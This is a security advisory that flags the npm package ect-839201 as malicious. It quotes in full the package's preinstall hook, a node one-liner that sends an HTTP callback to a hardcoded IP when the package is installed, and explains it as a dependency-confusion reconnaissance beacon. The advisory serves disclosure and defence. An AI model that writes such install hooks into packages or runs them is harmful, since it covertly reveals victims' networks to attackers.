Malicious code in ect-839201 (npm)
MAL-2026-5720
Published · Modified
Description
__
Source: amazon-inspector (0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3)
package.json declares a preinstall lifecycle hook that runs node -e "require('http').get('http://10.107.121.85:8001/callback_839201')" on npm install. This unconditionally issues an HTTP GET to a hardcoded RFC1918 address (10.107.121.85:8001) over plaintext, with a path (/callback_839201) that encodes a unique per-package probe identifier. The behavior fires automatically as part of the install lifecycle with no opt-in. The combination of (a) a bare-IP, non-publisher destination, (b) a unique callback identifier matched to the package name, and (c) plaintext HTTP on an internal/private network is the canonical dependency-confusion reconnaissance beacon: it confirms reachability from the installer's network into an attacker-controlled listener and leaks the installer's source IP, install timing, and the fact that this specific probe package resolved inside the target environment. Even though the captured request body is empty, the install itself is the signal — successful callbacks identify victim networks for follow-on attacks.
References
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.5
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.1
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.6
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.7
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.2
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.4
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.3
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.0
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.10
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.9
- PACKAGE https://www.npmjs.com/package/ect-839201/v/100.0.8
Ready to move
Start Securing
Free, no credit card | First findings in minutes